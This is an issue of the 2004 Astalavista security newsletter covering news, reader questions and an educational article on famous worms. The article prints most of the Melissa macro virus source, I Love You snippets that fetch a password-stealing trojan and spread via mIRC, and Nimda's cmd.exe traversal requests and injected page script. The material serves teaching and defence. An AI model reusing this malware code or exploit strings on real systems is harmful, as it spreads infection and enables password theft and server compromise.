Copy Link
Add to Bookmark
Report
Astalavista Group Security Newsletter Issue 04
|------------------------------------------|
|- Astalavista Group Security Newsletter -|
|- Issue 4 24 February 2004 -|
|- http://www.astalavista.com/ -|
|- security@astalavista.net -|
|------------------------------------------|
- Table of contents -
[01] Introduction
[02] Security News
- Will computing be more secure in 2004?
- Lamo pleads guilty to Times Hack
- Feds seek wiretap access via VoIP
- MyDoom Worm hits the net
- Belgian police arrests female virus coder - Gigabyte
[03] Astalavista Recommends
- Breaking into computer networks from the Internet
[04] Site of the Month - ReactOS.com
[05] Free Security Consultation
- With the appearance of Mydoom...
- Hello guys.I'm confused...
- What is the worst scenario...
[06] Enterprise Security Issues
- Known Malware Exploits Explained
[07] Home Users Security Issues
- Malicious Software (Malware) - How To Protect Myself
[08] Meet the Security Scene
- Interview with an Anonymous Malwares' Coder
[09] Security Sites Review
- CCMostWanted.com
- Security-Forums.com
- RootPrompt.org
[10] Astalavista needs YOU!
[11] Special Promotions - Astalavista.net
[12] Final Words
01. Introduction
------------
Dear Subscribers,
Welcome to Issue 4 of Astalavista's Security Newsletter!
Did you enjoy your holidays? At Astalavista we did, but we also spent a great deal of time working on
the new face of Astalavista.com, everyone keeps mailing us about.Thanks for the nice recommendations,
we keep them in mind and already started working with several contributors that proposed major changes of the portal.
So what's new? Astalavista.com is turning into a daily updated, dynamic and resourceful Security Portal; our Newsletter's
subscribers have increased to more than 22,000; we are also about to launch several new sections at the site.We're sure
you're going to enjoy them the way you enjoy the renovated Astalavista.com.In Issue 4 we're emphasizing on the malware
problem due to the recent appearance of the MyDoom worm. You're also going to read an interesting interview with a malware
coder who prefered to stay anonymous.Enjoy!
We would like to hear from you! What do you think about Astalavista.com? What is your opinion about the Security Newsletter?
Mail us at security@astalavista.net
Meanwhile,take a look at:
Astalavista's newest flash movie
http://www.mediaplantage.ch/intro.swf
Previous Issues of Astalavista's Security Newsletter can be found at:
http://astalavista.com/index.php?section=newsletter
Editor - Dancho Danchev
dancho@astalavista.net
Proofreader - Yordanka Ilieva
danny@astalavista.net
02. Security News
-------------
The Security World is a complex one.Every day a new vulnerability is found,
new tools are released, new measures are made up and implemented etc.
In such a sophisticated Scene we have decided to provide you with the most
interesting and up-to-date Security News during the month, a centralized
section that will provide you with our personal comments on the issue discussed.
Your comments and suggestions about this section are welcome at
security@astalavista.net
-------------
[ WILL COMPUTING BE MORE SECURE IN 2004? ]
Peter H. Gregory, Computerworld's columnist has written an article discussing all the major security threats and his
viewpoint on their importance in 2004.
More information can be found at:
http://www.pcworld.com/news/article/0,aid,114066,00.asp
Astalavista's Comments:
Availability and increased productivity in terms of security, it has always
been like that.Each new technology, no matter how useful, brings a large number
of security issues with itself.Year 2004 is predicted to be one of the toughest for the
Information Security industry-companies and analysts expect the Superworm, the most
devastating and destructive worm created so far; CyberTerrorism activities are believed to
increase as well; another issue that deserves a lot of attention is the coordination of terrorist
groups over the Internet by using stenography, or sometimes even in plain text discussions.
Overall, Peter H. Gregory has discussed the major trends in the IS industry for year 2004.
Vigilance and education is what can minimize the damages.
[ LAMO PLEADS GUILTY TO TIMES HACK ]
Hacker Adrian Lamo pleaded guilty Thursday to federal computer crime charges arising
from his 2002 intrusion into the New York Time internal network, and faces a likely six to twelve
months in custody when he's sentenced in April.
More info can be found at:
http://securityfocus.com/printable/news/7771
http://www.securityfocus.com/news/340
Astalavista's Comments:
Bad news for Lamo who seems to be capable, although have you ever questioned youself what is
going to happen when you propose to fix a critical vulnerability in a company you've been recently trying to
exploit, and the company refuses? It will all end up there.
[ FEDS SEEK WIRETAP ACCESS VIA VOIP ]
The FBI and the Justice Department have renewed their efforts to wiretap voice conversations carried across the Internet.
More info can be found at:
http://news.com.com/2100-7352_3-5137344.html
Astalavista's Comments:
I doubt it will be only the FBI taking advantage of wiretapping VoIP communications, it will definitely give NSA the ability
to proactively monitor large VoIP networks, and, yes, they have the computer power.
[ MYDOOM WORM HITS THE NET ]
Another worm is in the wild, this time targeting SCO's and Microsoft's web servers.The current analyses of the worm and the
monitored effects of its infections worldwide show that it's spreading very fast, hitting millions of users.The second version
of the worm even blocks anti-virus software updates and the users' ability to visit security related sites, thus being able
to get information on how to remove it.What is interesting to point out is that the worm completely relies on people's naivety-
the e-mail consists of random subjects, bulk bodies, while it might be received from a known e-mail address, probably someone
who's been infected as well.Read the e-mail, then open the attachment, nothing personal...
More info can be found at:
http://astalavista.com/?section=news&cmd=details&newsid=19
http://www.frame4.com/php/article1718.html
http://www.frame4.com/php/modules.php?name=News&file=article&sid=1739
http://www.securitynewsportal.com/cgi-bin/cgi-script/csNews/csNews.cgi?command=viewone&id=58&database=JanDD%2edb
http://www.securitynewsportal.com/cgi-bin/cgi-script/csNews/csNews.cgi?command=viewone&id=59&database=JanDD%2edb
http://www.securitynewsportal.com/cgi-bin/cgi-script/csNews/csNews.cgi?command=viewone&id=66&database=JanDD%2edb
Astalavista's Comments:
SCO was successfully hit, the first version of the worm did its work, which means that the number of users
still unaware of the dangers caused by malware isn't changing. Out of ten messages, how many did include the
MyDoom worm?
[ BELGIAN POLICE ARRESTS FEMALE HACKER GIGABYTE ]
Belgian police arrested a 19-year-old female technology student who gained international popularity
for creating computer viruses.
More info can be found at:
http://www.securityfocus.com/news/8048
Astalavista's Comment:
How do you expect to have female geeks when you bust them? Gigabyte's biggest mistake was her
publicly known image of a "female hacker", too much publicity in this case isn't good, and she's busted with the appearance
of MyDoom...
03. Astalavista Recommends
----------------------
This section is unique by its idea and the information included within.Its
purpose is to provide you with direct links to various white papers covering
many aspects of Information Security.These white papers are defined as a "must
read" for everyone interested in deepening his/her knowledge in the Security field.
The section will keep on growing with every new issue.Your comments and suggestions
about the section are welcome at security@astalavista.net
" THE STANDARD OF GOOD PRACTICE FOR INFORMATION SECURITY "
The Information Security Forum recently released this paper developed through the years
and distributed among its members.240 pages discussing the major security threats organizations
and companies face every day, ways for implementation and control are discussed as well.Read this one!
http://www.frame4.com/exchange/standard.pdf
" SECURING AND OPTIMIZING LINUX - REDHAT EDITION "
Still haven't read this one?! It's extremely comprehensive and covers almost everything as
far as securing a linux box(particularly a box running RedHat Linux)is concerned, from general security,
to firewall configuration, SSH configuration, Tripware use, Sendmail, DNS, Web server security,
all in this 486 pages document.
http://www.frame4.com/exchange/secure-linux.pdf
" WHAT IS INFORMATON WARFARE "
Written in 1995 by Martin C. Libichki, from the National Defense University,it provides the reader with the
most comprehensive explanation of each of the seven (7) types of Information Warfare.
http://www.frame4.com/exchange/warfare.pdf
" INTRUSION DETECTION SYSTEMS AND COMPUTER FORENSICS "
A detailed presentaion about the use of IDSs in computer forensics, it will also give you an extended
overview of everything you need to know about IDSs.
http://www.frame4.com/exchange/ids-forensics.pdf
" AN INTRODUCTION TO CYBERNETICS "
From the book's preface " Many workers in the biological sciences - psychologists, psychologists,
sociologists - are interested in cybernetics and would like to apply its methods and techniques
to their own speciality.Many have, however, been prevented from taking up the subject of
electronics and advanced pure mathematicsl for they have formed the impression that cybernetics
and these subjects are inseperable."
http://www.frame4.com/exchange/cybernetics.pdf
04. Site of the Month
----------------
ReactOS is an Open Source effort to develop a high-quality operating system that is compatible
with WindowsNT applications and drivers.
More info is available at:
http://www.reactOS.com/
05. Free Security Consultation
--------------------------
Have you ever had a Security related question but you weren't sure where to
direct it to? This is what the "Free Security Consultation" section was created for.
Due to the high number of Security concerning e-mails we keep getting on a
daily basis, we have decided to start a service free of charge, and offer
it to our subscribers.Whenever you have a Security related question, you are
advised to direct it to us, and within 48 hours you will receive a qualified
response from one of our Security experts.The questions we consider most
interesting and useful will be published at the section.
Neither your e-mail, nor your name will be present anywhere.
Direct all of your Security questions to security@astalavista.net
We were pleasently surprised to see the number of this month's security related questions.
Thanks a lot for your interest in this free security service, we are doing our best to respond
as soon as possible, and provide you with an accurate answer to your questions.
---------
Question: With the appearance of Mydoom, I've started having concerns on how protected my
office computers are.We have seven computers, all of them have the commercial version of ZoneAlarm
installed and anti-virus scanners on each of the computers, plus the gateway anti-virus scanner
offered by our web hosting provider.
---------
Answer: As far as protection from the outside is concerned, the measures you have in place are reasonable for the
small office network that you have.This, of course, doesn't mean that malware couldn't enter in your network;
something else you should seriously consider evaluating is your staff members' awareness of viruses,
trojans and worms.Do they know how to protect themselves by not opening an attachment they received, even when
it's coming from a friend? Peer-to-Peer software and acccess should be blocked as well; due to a lot of malware
spreads through these, your staff is again exposed to a possible infection.
--------
Question: Hello guys.I'm confused, I believe I can take care of the security of my computer,
but I cannot do anything when a friend that has my e-mail in his/her address books infects with
a worm that distributes itself using my e-mail address.As a result, I'm getting quite a lot of
e-mails from anti-virus scanners that have blocked my e-mails and e-mails from postmasters that
I'm infected with a worm.
--------
Answer: A personal recommendation to all the admins out there, in times of worms spreading around,
please turn off the gateway anti-virus notification when a virus is discovered in the message :-)
You can't control who adds your e-mail in his/her address book the same way you can't control which
spammer can add your e-mail in the e-mails database.If you're that seriously taking care of your friends'
security, provide them with articles related to protection againsts malware, with the idea to
educate them.
--------
Question: What is the worst scenario as far as these worms are concerned?
--------
Answer: I'm sure every security expert or even a computer enthusiast out there can point out at least five
possible scenarios, but consider the following one - what will be the impact of a worm spreading faster than
the Slammer worm which scanned several billion IP addresses in less than 15 minutes, with the destruction capabilities of
the CIH virus?
06. Enterprise Security Issues
--------------------------
In today's world of high speed communications, of companies completely
relying on the Internet for making business and increasing productivity, we have
decided that there should be a special section for corporate security, where
advanced and highly interesting topics will be discussed in order to provide
that audience with what they are looking for - knowledge!
In this issue, we've included an article contributed by Abhishek Bhuyan.It gives an overview
of the most common malware released by now, comments on its source code are included as well.
Known Malware Exploits Explained
by Abhishek Bhuyan
http://www.lucky-web.net/
Intruders who access networks and systems without authorization, or inside attackers with
malicious motives, can plant various types of programs to cause damage to the network.
These programs often lumped together under the general term viruses, although other varieties
have cost companies and individuals billions of dollars in lost data,lost productivity,and the
time and expense of recovery. Some of the more destructive examples of malicious code, also sometimes
referred to as malware [MALicious softWARE - mark the uppercase MALWARE] over the past decade, are:
- CIH/Chernobyl - In the late 1990s, this virus caused a great deal of damage to business and
home computer users.It infected executable files and was spread by running an infected file on
a Windows 95/98 machine. There were several variants of CIH; these were "time bomb" viruses that
were activated on a predefined date (either April 26-the anniversary of the Chernobyl disaster or
every month on the 26th). Until the trigger date, the virus remained dormant. Once the computer's internal
clock indicated the activation date, the virus would overwrite the first 2048 sectors of every hard disk
in the computer,thus wiping out the file's allocation table and causing the hard disk to appear to be erased.
However, the data on the rest of the disk could be recovered using data recovery software; many users
were unaware of this capability. The virus also attempted towrite to the basic input output system (BIOS)
boot block, rendering the computer unbootable. (This did not work on computers that had been set to
prevent writing to the BIOS.) This virus started to show up again in the spring of 2002,
piggybacking on the Klez virus.
- Melissa - This was the first virus to be widely disseminated via e-mail, starting in March 1999.
It is a macro virus, written in Visual Basic for Applications (VBA) and embedded in a Microsoft Word
97/2000 document. When the infected document is opened, the macro runs (unless Word is set not to run macros),
sending itself to the first 50 entries in every Microsoft Outlook MAPI address book.
These include mailing list addresses, which could result in a very rapid propagation of the virus.
The virus also made changes to the Normal.dot template, which caused newly created Word documents to
be infected. Because of the huge volume of mail it produced, the virus caused a denial of service (DoS)
on some e-mail servers. The confessed author of the virus, David Smith,
was sentenced to 20 months in federal prison and fined $5,000.
- Code Red - In the summer of 2001, this self-propagating worm began to infect Web servers
running Internet Information Server (IIS). On various trigger dates, the infected machine
would try to connect to TCP port 80 (used for Web services) on computers with randomly
selected IP addresses. When successful, it attempted to infect the remote systems.
Some variations also defaced Web pages stored on the server. On other dates, the
infected machine would launch a DoS attack against a specific IP address embedded
in the code. CERT reported that Code Red infected over 250,000 systems over the
course of nine hours on July 19, 2001.
- Nimda - In the late summer of 2001, the Nimda worm infected numerous computers
running Windows 95/98/ME, NT, and 2000.The worm made changes to Web documents and executable
files on the infected systems and created multiple copies of itself.It spread via e-mail,
via network shares, and through accessing infected Web sites. It also exploited vulnerabilities in
IIS versions 4 and 5 and spread from client machines to Web servers through the back doors
left by the Code Red II worm.Then Nimda allowed attackers to execute arbitrary commands on
IIS machines that had not been patched, and DoS attacks were caused by the worm's activities.
- Klez - In late 2001 and early 2002, this e-mail worm spread throughout the Internet.
It propagates through e-mail mass mailings and exploits vulnerabilities in the unpatched
versions of Outlook and Outlook Express mail clients, attempting to run when the message
containing it is previewed. When it runs, it copies itself to the System or System32 folder
in the system root directory and modifies a registry key to cause it to be executed when
Windows is started.It also tries to disable any virus scanners and sends copies of itself
to addresses in the Windows address book, in the form of a random filename with a double
extension (for example, file.doc.exe). The payload executes on the 13th day of every other month,
starting with January, resulting in files on local and mapped drives being set to 0 bytes.
Now I'm going to explain about the 3 most popular malwares - some exploits which these
malwares used, but NOT how the whole code worked or how to code a malware to exploit.
I'm not that genious :-)
"Melissa" , "I Love You" and "Nimda" Worms
- Melissa Worm -
These two macro viruses/worms had a widespread impact on computer systems that
was borderline chaotic. The associated amount of damages in dollars(nearly $8 billion) is
borderline absurd. What made these worms so effective? Both Melissa
and I Love You used the victim's address book as the next round of victims.
Since the source of the e-mail appears to be someone you know, a certain "trust"
is established that causes the recipients to let their guard down.
Melissa is actually a fairly simple and small macro virus. In an effort to show how simple a worm can be,
let's go through exactly what Melissa comprises:
Private Sub Document_Open()On Error Resume Next
Melissa works by infecting the Document_Open() macro of Microsoft Word files. Any code placed in the Document_Open()
routine is immediately run when the user opens the Word file. That said, Melissa propagates by users opening infected
documents, which are typically attached in an e-mail.
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security",
"Level") <> ""
Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security",
"Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection =
(1 - 1):Options.SaveNormalPrompt = (1 - 1)
End If
Here Melissa makes an intelligent move -> It disables the macro security features of Microsoft Word. This allows it to
continue unhampered, and avoid alerting the end user that anything is going on.
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
Messaging API (MAPI) is a way for Windows applications to interface with various e-mail functions
(which is usually provided by Microsoft Outlook, but there are other MAPI-compliant e-mail packages available).
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\
Microsoft\Office\", "Melissa?") <> "... by Kwyjibo"
Melissa includes a failsafe,i.e it has a way to tell if it has already run, or 'infected' this host. For Melissa in
particular, this is setting the preceding Registry key to the indicated value. At this point, if the key is not set,
it means Melissa has not yet run, and should go about executing its primary payload.
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
Here we see Melissa checking to see if the application is Microsoft Outlook, and if so,
composing a list of the first 50
e-mail addresses found in the user's address book.
BreakUmOffASlice.Subject = "Important Message From " & Application
.UserName
BreakUmOffASlice.Body = "Here is that document you asked for
... don't show anyone else ;-)"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
This is the code that actually sends the e-mail to the 50 addresses previously found. You can see the subject, which is
personalized using the victim's name. You can also see that Melissa simply attaches itself to the e-mail in one line, and
then one more command sends the message.
Peep = ""
Next y
DasMapiName.Logoff
End If
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
End If
Finally, the sending is wrapped up, and to make sure we do not keep sending all these e-mails, Melissa sets the
failsafe by creating a Registry entry (which is checked for earlier in the code).
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
Here Melissa checks to see if the active document and document template (normal.dot) are infected; if they are, it will
jump down to the exit code ("GoTo CYA"). If they are not, then it will infect them:
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN,
NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
The document infection code. Here we see Melissa modifying the Document_Open() function of the active document. We also
see that the Document_Close() function of the document template was modified-this means every new document created,
upon closing or saving, will run the Melissa worm.
CYA:
If NTCL <> 0 And ADCL = 0 And
(InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True
End If
Here Melissa finishes by saving the current active document, making sure a copy of itself has been successfully stored.
'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points,
plus triple-word-score, plus fifty points for using all my letters.
Game's over. I'm outta here."
End Sub
- I Love You Worm -
The I Love You virus is a little more bulky, so I chose not to include the entire script here. You can download all of the
I Love You source from: http://www.packetstormsecurity.org/viral-db/love-letter-source.txt
What is interesting to note about the I Love You virus is that it randomly changed the user's default Web browser
homepage to one of four locations, as seen here by the code:
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page",http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTF
wetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page",http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGF
ikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page",http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFE
kbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page",http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJB
hAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234
iuy7thjg/WIN-BUGSFIX.exe
end if
end if
The WIN-BUGSFIX.exe turned out to be a Trojan application designed to steal passwords.
Now, a quick look notices all of the URLs present are on www.skyinet.net. This resulted
in many places simply blocking access to that single host. While bad for skyinet.net, it was
an easy fix for administrators. Imagine if the virus creator has used more popular
hosting sites, such as the members' homepages of aol.com, or even made reference to large sites,
such as yahoo.com and hotmail.com ; would administrators rush to block those sites as well?
Perhaps not. Also, had someone at skyinet.net been smart, they would have replaced the Trojan
WIN-BUGSFIX.exe with an application that would disinfect the system of the I Love You virus.
That is, if administrators allowed infected machines to download the "Trojaned Trojan."
I Love You also modifies the configuration files for mIRC, a popular Windows IRC chat client:
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or
(s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will
corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not
run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-
FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
Here we see I Love You making a change that would cause the user's IRC client to send
a copy of the I Love You virus to every person who joins a channel that the user is in.
Of course, the filename has to be enticing to the users joining the
channel, so they are tempted into opening the file.
- Nimda Worm - The coolest one !
In September 2001 a very nasty worm reared its ugly head. The Nimda
(Just reverse nimda and you get admin) worm, also called the Concept virus, was another worm,
which propagated via Microsoft hosts. Nimda featured multiple methods to infect a host:
It could send itself via e-mail. It would attach itself as an encoded .exe file,
but would use an audio/x-wave Multipurpose Internet Mail Extensions (MIME) type,
which triggered a bug in Internet Explorer to automatically execute the attachment upon
previewing the e-mail. Once the attachment was executed, the worm would send itself to
people in the user's address book as well as e-mail addresses found on Web pages in Internet Explorer's
Web page cache-that means the worm would actually find e-mail addresses on recently browsed
Web pages! The worm would scan for vulnerable IIS machines, looking for the root.exe files
left over from the Code Red II and Sadmind worms, as well as using various Unicode and
double-encoding URL tricks in order to execute commands on the server.The following is a
list of requests made by the worm:
GET /scripts/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
Once the worm found a vulnerable IIS server, it would attempt to Trivial File Transfer Protocol (TFTP)
the worm code to the target server. It would also modify the IIS server by creating a guest
account and adding it to the Administrators' group.It would also create a Windows share of
the C: drive (using the name C$).
All local hypertext markup language (HTML) and Application Service Provider (ASP) files
would be modified to include the following code snippet:
<script language="JavaScript">
window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
</script>
In addition, the worm would copy itself to the readme.eml file. The final result was
that unsuspecting Web surfers would automatically download, and possibly execute,
the worm from an infected Web site.
The worm copies itself into .EML and .NWS in various local and network directories.
If an unsuspecting user uses Windows Explorer to browse a directory containing these files,
it is possible that the automatic preview function of Explorer would automatically execute the worm.
This would allow the worm to propagate over file shares on a local network.
The worm also copies itself to riched.dll, which is an attempt to Trojan Microsoft Office documents,
since documents opened in the same directory as the riched.dll binary will load and execute the Trojan DLL.
The end result was a noisy, but very effective, worm. It was noisy because it created many
.EML and .NWS files on the local system. It also modified Web pages on the Web site,
which made it easy to remotely detect a compromised server. But the multi-infection
methods proved quite effective, and many people who had run through and removed the worm had
found that their systems kept getting infected-it is a tough worm to fully eradicate! To properly combat it,
the security administrator needed to patch their IIS server, upgrade their Microsoft Outlook
client, and be cautious of browsing network shares. Full information on the Nimda worm is
available in the Security Focus analysis
http://aris.securityfocus.com/alerts/nimda/010921-Analysis-Nimda-v2.pdf
Some tips on prevention and response:
---------------------------------------------
Protecting systems and networks from the damage caused by Trojan horses, viruses, and worms is mostly a matter of
common sense. Practices that can help prevent infection include the following:
- Do not run executable (.EXE) files from unknown sources, including those attached to an e-mail or downloaded from
Web sites.
- Turn off the Preview and/or HTML mail options in the e-mail client program.
- Do not open Microsoft Office documents from unknown sources without first disabling macros.
- Be careful about using diskettes that have been used in other computers.
- Install and use firewall software.
- Install antivirus software, configuring it to run scans automatically at predefined times and updating the definition
files regularly.
- Use intrusion prevention tools called behavior blockers that deny programs the ability to execute operations that have
not been explicitly permitted.
- Use behavior detection solutions such as Finjan's SurfinGate and SurfinShield that can use investigative techniques
to analyze executable files and assess whether they are likely to be hostile.
http://www.finjan.com/products/surfingate.cfm
- Use integrity checker software (such as Tripwire) to scan the system for changes.
- Recognizing the presence of a malicious code is the first-response step if a system gets infected.
Administrators and users need to be on the alert for common indications that a virus might be present,
such as the following:
Missing files or programs
Unexplained changes to the system's configuration
Unexpected and unexplained displays, messages, or sounds
New files or programs that suddenly appear with no explanation
Memory "leaks" (less available system memory than normal)
Unexplained use of disk space
Any other odd or unexplained behavior of programs or the operating system
If a virus is suspected, a good antivirus program should be installed and run to scan the system for viruses and attempt
to remove or quarantine any that are found. Finally, all mission-critical or irreplaceable data should be backed up on a
regular basis in case all these measures fail.
Virus writers are a creative and persistent bunch and will continue to come up with new ways to do the "impossible,"
so computer users should never assume that any particular file type or OS is immune to malicious code.
The only sure way to protect against viruses is to power down the computer and leave it turned off :-)
Information about specific viruses and instructions on how to clean an infected system is available at www.symantec.com
and www.mcafee.com. Both antivirus vendors provide detailed databases that list and describe known viruses.
But I recommend being in touch with the site http://www.securitynewsportal.com/ (one of my favourite).
Here you will get hourly updates about latest security, hacking, virus and trojan news. And, of course,
http://astalavista.net/ !
07. Home Users Security Issues
--------------------------
Due to the high number of e-mails we keep getting from novice users, we have
decided that it would be a very good idea to provide them with their very
special section, discussing various aspects of Information Security in an
easy to understand way, while, on the other hand, improve their current level of knowledge.
If you have questions or recommendations for the section, direct
them to security@astalavista.net Enjoy yourself!
- Malicious Code (Malware) - How To Protect Myself -
The recent appearance of the MyDoom Worm, and the attacks on SCO's web site (http://sco.com), has again opened
the discussion on the end user's education and awareness of malicious software. Basically, worms like the MyDoom
one target the home users instead of the corporate ones, but why? The worm's aim in this case is to infect as many home
users as possible, then use their connection's bandwith in order to launch an attack on SCO's web site, simultaneously
and in coordination with all the victims.Don't get me wrong, a lot of Fortune 500 companies have problems with
the worm as well, due to the fact that it spreads via .zip attachments which are commonly used in the corporate
environment for both sending and receiving large attachments, but who do you think has a greater chance of infection-
the corporate end user protected by the company's gateway content filtering and anti-virus software, or the home user
who sometimes doesn't even have a reliable firewall installed on his/her computer? Corporate users, of course,
got infected as well, insecure laptop maintainance, personal correspondance through the corporate's e-mail and many
other factors contributed to the aforesaid problems with Fortune 500 companies.
- How powerful are worms? -
Worms' networks are one of the most powerful DDoS (Distributed Denial of Sercive) attack tools, creating a
network with thousands of "participants" who will use their bandwith, which in most of the cases is an "always-on"
connection. Simultaneously attacking the given target, having a network of litellary thousands of infected computers,
will allow the attacker to shut down any site worldwide.
The I LOVE YOU worm is believed to have caused billions of damages worldwide, in the above-mentioned article
"Known Malware Exploits Explained" you can read more about the most famous and destructive worms released so far.
- How can I get infected? -
The majority of Internet Worms targeting end users, usually spread via e-mail and IRC, and those targeting
companies' networks and servers spread via IP scanning, file shares, auto-exploiting a known/unknown vulnerability.
Due to its nature, the e-mail is the most commonly used method of spreading in the wild.Here we'll discuss several
scenarios:
- Using outdated software
One of the worst scenarios is when you're using an outdated software, namely a software that has at least one
publicly known vulnerability. And when this software happens to be the browser or the e-mail client you're using,
then it's just a matter of time for someone to exploit the vulnerability, which in most of the cases consists of
auto-execution of a file sent to your e-mail, just by viewing the message. Refer to your vendor's web site at least
once per week to check with the latest vulnerabilities. Sometimes the vulnerability is known to the public,
while the vendor cannot respond with a patch as soon as it's expected to do so.
- Lack of awareness
There's still a large number of home users who don't make a distinction between a virus, trojan and a worm,
they are unaware of the sender's real intentions and the world epidemy they'll become part of, just executing
the attachment sent to their mailboxes. Realize the consequences of your actions both to your home computer and to
the millions of Internet users worldwide, it's everyone's responsibility.
- Lack of an anti-virus software and a stable firewall
Although anti-virus scanners cannot gurantee 100% protection against viruses, trojans and worms, they're a "must have",
because they eliminate a large number of known dangerous programs- sometimes the attack might come from an attack
targeting especially users who don't even have an anti-virus scanner. Getting infected by the latest fast-spreading
worm is something else, but getting infected by a malware that's been into the product's database of signatures for
the past half an year is another story. Something else to consider is that having an anti-virus scanner that is not
regularly updated (on a weekly basis) will only give you a false sense of security.
Having a decent firewall will also increase your protection, but bear in mind that the firewall should be properly
configured - there're certain firewalls that automatically configure themselves and are created for novice Internet users.
These will work OK, as soon as you don't let a malware make a connection to the outside world (the Internet).
A list of various Windows based firewalls can be located here:
http://www.firewallguide.com/software.htm
A paper entitled The Complete Windows Trojans Paper (http://www.astalavista.com/media/files/comp_trojans.txt) fully
